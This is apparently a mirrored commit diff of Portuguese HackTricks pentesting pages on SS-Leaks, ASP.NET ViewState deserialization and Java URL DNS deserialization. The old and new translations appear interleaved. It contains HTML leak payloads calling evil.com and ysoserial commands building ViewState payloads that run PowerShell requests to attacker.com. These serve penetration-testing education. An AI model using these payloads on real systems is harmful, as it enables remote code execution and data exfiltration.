Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-27 23:20:49 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

Browse source
This commit is contained in:
Translator 2024-01-01 19:42:29 +00:00
parent e553394b9f
commit 0cd20bc651
23 changed files with 1355 additions and 1481 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

57
pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md
View file

@ -1,22 +1,24 @@
# Vazamentos de SS
# SS-Leaks
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
Este é um **mix** entre **marcação pendente e XS-Leaks**. De um lado, a vulnerabilidade permite **injetar HTML** (mas não JS) em uma página da **mesma origem** daquela que estaremos atacando. Por outro lado, não **atacaremos** diretamente a página onde podemos injetar HTML, mas **outra página**.
Isto é uma **mistura** entre **dangling markup e XS-Leaks**. De um lado, a vulnerabilidade permite **injetar HTML** (mas não JS) em uma página da **mesma origem** daquela que estaremos atacando. Por outro lado, não vamos **atacar** diretamente a página onde podemos injetar HTML, mas **outra página**.
## Objetos Aninhados
Se o endpoint <mark style="color:yellow;">`/api/v1/leaky?secret=a`</mark> retornar um código de status 404, então o `object` interno é carregado, dando um retorno de chamada para <mark style="color:yellow;">`https://evil.com?callback=a`</mark> e nos informando que a consulta de pesquisa `a` não produziu resultados.
Se o endpoint <mark style="color:yellow;">`/api/v1/leaky?secret=a`</mark> retornar um código de status 404, então o `object` interno é carregado, dando um callback para <mark style="color:yellow;">`https://evil.com?callback=a`</mark> e nos informando que a consulta de pesquisa `a` não gerou resultados.
```html
<object data="/api/v1/leaky?secret=a">
<object data="https://evil.com?callback=a"></object>
@ -28,7 +30,7 @@ E se o CSP bloquear objetos externos? Vamos tentar novamente com o seguinte CSP:
<mark style="color:yellow;">`Content-Security-Policy: default-src 'self'; img-src *;`</mark>
Nosso callback `object` de cima não funciona mais. Em seu lugar, podemos usar o [carregamento preguiçoso](https://developer.mozilla.org/pt-BR/docs/Web/Performance/Lazy_loading) de imagens! A seguinte imagem só será carregada quando estiver visível e dentro de uma certa distância da viewport.
Nosso `object` de retorno de chamada acima já não funciona. Em seu lugar, podemos usar o carregamento preguiçoso de imagens [lazy loading](https://developer.mozilla.org/en-US/docs/Web/Performance/Lazy\_loading)! A seguinte imagem só será carregada quando estiver visível e a uma certa distância da área de visualização.
```html
<object data="/api/v1/leaky?secret=a">
<img src="https://evil.com?callback" loading="lazy">
@ -36,11 +38,11 @@ Nosso callback `object` de cima não funciona mais. Em seu lugar, podemos usar o
```
### Imagens Responsivas
A técnica acima é ótima, mas depende da nossa injeção de HTML estar dentro da área visível do usuário.
A técnica acima é ótima, mas depende da nossa injeção de HTML estar dentro do campo de visão do usuário.
Se a injeção estiver fora da tela e o usuário não rolar, ainda podemos vazar dados? Claro, podemos usar IDs de elementos e [scroll-to-text-fragment](https://chromestatus.com/feature/4733392803332096) para criar uma URL que force uma rolagem, mas isso depende da interação do usuário e não nos permite obter vazamentos consistentes em um cenário do mundo real. Idealmente, queremos utilizar a injeção de HTML armazenada de forma confiável.
Se a injeção estiver fora da tela e o usuário não rolar a página, ainda podemos vazar dados? Claro, podemos usar IDs de elementos e [scroll-to-text-fragment](https://chromestatus.com/feature/4733392803332096) para criar uma URL que force a rolagem, mas esses dependem da interação do usuário e não nos permitem alcançar vazamentos consistentes em um cenário real. Idealmente, queremos instrumentalizar a injeção de HTML armazenada de maneira confiável.
Aqui entram as imagens responsivas! Especificamente, os atributos `srcset` e `sizes` das imagens.
Entrem as imagens responsivas! Especificamente, os atributos `srcset` e `sizes` das imagens.
{% code overflow="wrap" %}
```html
@ -48,13 +50,14 @@ Aqui entram as imagens responsivas! Especificamente, os atributos `srcset` e `si
<iframe srcdoc="<img srcset='https://evil.com?callback=1 480w, https://evil.com?callback=0 800w' sizes='(min-width: 1000px) 800px, (max-width 999px) 480px'>" width="1000px">
</object>
```
{% endcode %}
Há várias coisas para entender aqui. Primeiro, lembre-se de que o iframe interno só será visível se o ponto de extremidade vazado retornar um código de status 404.
Isso é importante porque agora vamos carregar condicionalmente a imagem dentro do iframe a partir de dois URLs diferentes. Usando o atributo `sizes`, podemos usar [media queries](https://developer.mozilla.org/en-US/docs/Web/CSS/CSS\_media\_queries/Using\_media\_queries) para escolher qual URL carregar a imagem, dependendo do tamanho da viewport.
```markdown
Há várias coisas para desempacotar aqui. Primeiro, lembre-se de que o iframe interno só será visível se o endpoint com vazamento retornar um código de status 404.
Isso é importante porque agora vamos carregar condicionalmente a imagem dentro do iframe a partir de duas URLs diferentes. Usando o atributo `sizes`, podemos usar [media queries](https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_media_queries/Using_media_queries) para escolher de qual URL carregar a imagem, dependendo do tamanho da viewport.
```
```markdown
{% code overflow="wrap" %}
```
```html
<img
srcset='https://evil.com?callback=0 800w, https://evil.com?callback=1 480w'
@ -65,8 +68,8 @@ sizes='(min-width: 1000px) 800px, (max-width 999px) 480px'
Porque nosso iframe tem `width="1000px"`, o seguinte acontece:
1. Se o endpoint vazado retornar um código de status 404, o iframe é exibido e tem uma largura de 1000px. A imagem dentro do iframe corresponde à media query `(min-width: 1000px)` e carrega a imagem de 800px de `https://evil.com?callback=0`.
2. Se o endpoint vazado retornar um código de status 200, o iframe _não_ é exibido. Como a imagem não está sendo renderizada como parte de um iframe grande, ela corresponde à media query `(max-width 999px)` e carrega a imagem de 480px de `https://evil.com?callback=1`.
1. Se o endpoint com leak retorna um código de status 404, o iframe é exibido e tem uma largura de 1000px. A imagem dentro do iframe corresponde à media query `(min-width: 1000px)` e carrega a imagem de 800px de `https://evil.com?callback=0`.
2. Se o endpoint com leak retorna um código de status 200, o iframe _não_ é exibido. Como a imagem não está sendo renderizada como parte de um grande iframe, ela corresponde à media query `(max-width 999px)` e carrega a imagem de 480px de `https://evil.com?callback=1`.
## Referências
@ -74,12 +77,14 @@ Porque nosso iframe tem `width="1000px"`, o seguinte acontece:
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda AWS hacking do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

66
pentesting-web/deserialization/exploiting-__viewstate-parameter.md
View file

@ -2,19 +2,21 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **versão mais recente do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* Adquira o [**material oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o repositório** [**hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Participe do grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou do grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.
</details>
<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
Se você está interessado em **carreira de hacking** e em hackear o inquebrável - **estamos contratando!** (_é necessário polonês fluente escrito e falado_).
Se você está interessado em **carreira de hacking** e em hackear o inquebrável - **estamos contratando!** (_fluência em polonês escrita e falada exigida_).
{% embed url="https://www.stmcyber.com/careers" %}
@ -24,11 +26,11 @@ Se você está interessado em **carreira de hacking** e em hackear o inquebráve
As seguintes propriedades ou combinação de propriedades se aplicam às informações do ViewState:
* Base64
* Pode ser definido usando os atributos EnableViewStateMac e ViewStateEncryptionMode definidos como false
* Base64 + MAC (Message Authentication Code) Ativado
* Pode ser definido usando o atributo EnableViewStateMac definido como true
* Pode ser definido usando os atributos EnableViewStateMac e ViewStateEncryptionMode configurados como false
* Base64 + MAC (Message Authentication Code) Habilitado
* Pode ser definido usando o atributo EnableViewStateMac configurado como true
* Base64 + Criptografado
* Pode ser definido usando o atributo viewStateEncryptionMode definido como true
* Pode ser definido usando o atributo viewStateEncryptionMode configurado como true
## **Casos de Teste**
@ -36,13 +38,13 @@ As seguintes propriedades ou combinação de propriedades se aplicam às informa
### Caso de Teste: 1 EnableViewStateMac=false e viewStateEncryptionMode=false
Também é possível desativar completamente o ViewStateMAC definindo a chave de registro `AspNetEnforceViewStateMac` como zero em:
Também é possível desativar completamente o ViewStateMAC configurando a chave de registro `AspNetEnforceViewStateMac` para zero em:
```
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v{VersionHere}
```
**Identificando Atributos ViewState**
Você pode tentar identificar se o ViewState está protegido por MAC capturando uma requisição que contenha esse parâmetro com o BurpSuite:
Você pode tentar identificar se o ViewState está protegido por MAC capturando uma solicitação que contenha esse parâmetro com o BurpSuite:
![](https://notsosecure.com/sites/all/assets/group/nss\_uploads/2019/06/1.0.png)
@ -53,12 +55,12 @@ ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "power
### Caso de teste 1.5 Como o Caso de teste 1, mas o cookie ViewState não é enviado pelo servidor
Desenvolvedores podem **remover o ViewState** de se tornar parte de uma Requisição HTTP (o usuário não receberá este cookie).\
Pode-se assumir que se o **ViewState** **não está presente**, a implementação está **segura** contra quaisquer vulnerabilidades potenciais surgindo com a desserialização do ViewState.\
Pode-se assumir que se o **ViewState** **não está presente**, a implementação está **segura** contra quaisquer vulnerabilidades potenciais que surjam com a desserialização do ViewState.\
No entanto, isso não é verdade. Se **adicionarmos o parâmetro ViewState** ao corpo da requisição e enviarmos nosso payload serializado criado usando ysoserial, ainda seremos capazes de alcançar a **execução de código** como mostrado no **Caso 1**.
### Caso de Teste: 2 .Net < 4.5 e EnableViewStateMac=true & ViewStateEncryptionMode=false
Para **habilitar o MAC do ViewState** para uma **página específica**, precisamos fazer as seguintes alterações em um arquivo aspx específico:
Para **ativar o MAC do ViewState** para uma **página específica**, precisamos fazer as seguintes alterações em um arquivo aspx específico:
```bash
<%@ Page Language="C#" AutoEventWireup="true" CodeFile="hello.aspx.cs" Inherits="hello" enableViewStateMac="True"%>
```
@ -84,41 +86,45 @@ AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0M
--encrypteddata : __VIEWSTATE parameter value of the target application
--modifier : __VIWESTATEGENERATOR parameter value
```
```markdown
![](https://notsosecure.com/sites/all/assets/group/nss\_uploads/2019/06/2.1.png)
[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) é outra ferramenta que pode identificar machineKeys conhecidos. É escrita em Python, então, ao contrário do Blacklist3r, não há dependência do Windows. Para viewstates .NET, existe a utilidade "python blacklist3r", que é a maneira mais rápida de usá-la.
Ela pode ser fornecida diretamente com o viewstate e o gerador:
```
```
pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE
```
Ou pode se conectar diretamente à URL alvo e tentar extrair o viewstate do HTML:
```markdown
Ou, pode-se conectar diretamente à URL alvo e tentar extrair o viewstate do HTML:
```
```
pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --url http://vulnerablesite/vulnerablepage.aspx
```
```markdown
![](https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png)
Para procurar viewstates vulneráveis em larga escala, em conjunto com a enumeração de subdomínios, o módulo `badsecrets` [**BBOT**](exploiting-\_\_viewstate-parameter.md) pode ser utilizado:
Para procurar por viewstates vulneráveis em larga escala, em conjunto com a enumeração de subdomínios, o módulo `badsecrets` [**BBOT**](exploiting-\_\_viewstate-parameter.md) pode ser utilizado:
```
```
bbot -f subdomain-enum -m badsecrets -t evil.corp
```
```markdown
![](https://user-images.githubusercontent.com/24899338/227028780-950d067a-4a01-481f-8e11-41fabed1943a.png)
Se você tiver sorte e a chave for encontrada, pode prosseguir com o ataque usando [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)**:**
```
```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
--generator = {__VIWESTATEGENERATOR parameter value}
```
Nos casos em que o parâmetro `_VIEWSTATEGENERATOR` **não é enviado** pelo servidor, você **não** precisa **fornecer** o parâmetro `--generator`, **mas estes sim**:
Em casos onde o parâmetro `_VIEWSTATEGENERATOR` **não é enviado** pelo servidor, você **não** precisa **fornecer** o parâmetro `--generator`, **mas estes sim**:
```bash
--apppath="/" --path="/hello.aspx"
```
@ -132,9 +138,9 @@ Neste caso, o Burp não identifica se o parâmetro está protegido com MAC porqu
**Antes do .NET 4.5**, o ASP.NET pode **aceitar** um parâmetro \_`__VIEWSTATE`\_ **não criptografado** dos usuários **mesmo** se **`ViewStateEncryptionMode`** estiver configurado para _**Always**_. O ASP.NET **apenas verifica** a **presença** do parâmetro **`__VIEWSTATEENCRYPTED`** na requisição. **Se alguém remover este parâmetro e enviar o payload não criptografado, ele ainda será processado.**
Portanto, se a Machinekey for conhecida (por exemplo, através de um problema de traversal de diretório), o comando [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) usado no **Caso 2**, pode ser usado para realizar RCE usando a vulnerabilidade de desserialização do ViewState.
Portanto, se a Machinekey for conhecida (por exemplo, através de um problema de traversal de diretório), o comando [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) usado no **Caso 2**, pode ser usado para realizar RCE usando a vulnerabilidade de deserialização do ViewState.
* Remova o parâmetro `__VIEWSTATEENCRYPTED` da requisição para explorar a vulnerabilidade de desserialização do ViewState, caso contrário, retornará um erro de validação do MAC do Viewstate e a exploração falhará, conforme mostrado na Figura:
* Remova o parâmetro `__VIEWSTATEENCRYPTED` da requisição para explorar a vulnerabilidade de deserialização do ViewState, caso contrário, retornará um erro de validação do MAC do Viewstate e a exploração falhará, conforme mostrado na Figura:
![](https://notsosecure.com/sites/all/assets/group/nss\_uploads/2019/06/3.1.png)
@ -192,7 +198,7 @@ Você precisa usar mais um parâmetro para criar corretamente o payload:
```
### Resultado de uma Exploração Bem-Sucedida <a href="#poc" id="poc"></a>
Para todos os casos de teste, se o payload YSoSerial.Net do ViewState funcionar **com sucesso**, então o servidor responde com “**500 Internal server error**” tendo como conteúdo da resposta “**The state information is invalid for this page and might be corrupted**” e recebemos a solicitação OOB conforme mostrado nas Figuras abaixo:
Para todos os casos de teste, se o payload ViewState YSoSerial.Net funcionar **com sucesso**, então o servidor responde com “**500 Internal server error**” tendo o conteúdo da resposta “**The state information is invalid for this page and might be corrupted**” e recebemos a solicitação OOB conforme mostrado nas Figuras abaixo:
![](https://notsosecure.com/sites/all/assets/group/nss\_uploads/2019/06/5.0POC-of-Seccuessful-exploitation.png)
@ -207,7 +213,7 @@ solicitação out of band com o nome de usuário atual
* [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
* [**https://blog.blacklanternsecurity.com/p/introducing-badsecrets**](https://blog.blacklanternsecurity.com/p/introducing-badsecrets)
<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
Se você tem interesse em **carreira de hacking** e em hackear o inquebrável - **estamos contratando!** (_fluência em polonês escrito e falado exigida_).
@ -215,12 +221,14 @@ Se você tem interesse em **carreira de hacking** e em hackear o inquebrável -
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **versão mais recente do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**merchandising oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas dicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

214
pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
View file

@ -1,75 +1,81 @@
## Deserialização DNS Java, GadgetProbe e Scanner de Deserialização Java
# Java DNS Deserialization, GadgetProbe e Java Deserialization Scanner
## Java DNS Deserialization, GadgetProbe e Java Deserialization Scanner
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## Solicitação DNS na deserialização
## Requisição DNS na deserialização
A classe `java.net.URL` implementa `Serializable`, o que significa que essa classe pode ser serializada.
A classe `java.net.URL` implementa `Serializable`, isso significa que esta classe pode ser serializada.
```java
public final class URL implements java.io.Serializable {
```
Esta classe tem um comportamento curioso. De acordo com a documentação: "**Dois hosts são considerados equivalentes se ambos os nomes de host puderem ser resolvidos para os mesmos endereços IP**".\
Então, toda vez que um objeto URL chama **qualquer** das funções **`equals`** ou **`hashCode`** uma solicitação **DNS** para obter o endereço IP será **enviada**.
```markdown
Esta classe tem um **comportamento curioso.** De acordo com a documentação: "**Dois hosts são considerados equivalentes se ambos os nomes de host puderem ser resolvidos nos mesmos endereços IP**".
Então, toda vez que um objeto URL chama **qualquer** das **funções `equals`** ou **`hashCode`**, uma **solicitação DNS** para obter o endereço IP será **enviada**.
**Chamar** a função **`hashCode`** **de** um objeto **URL** é bastante fácil, é suficiente inserir este objeto dentro de um `HashMap` que será desserializado. Isso ocorre porque **no final** da função **`readObject`** de `HashMap`, este código é executado:
**Chamar** a função **`hashCode`** **de** um objeto **URL** é bastante fácil, basta inserir este objeto dentro de um `HashMap` que vai ser desserializado. Isso ocorre porque **no final** da função **`readObject`** do `HashMap`, este código é executado:
```
```java
private void readObject(java.io.ObjectInputStream s)
throws IOException, ClassNotFoundException {
[ ... ]
for (int i = 0; i < mappings; i++) {
[ ... ]
putVal(hash(key), key, value, false, false);
}
```
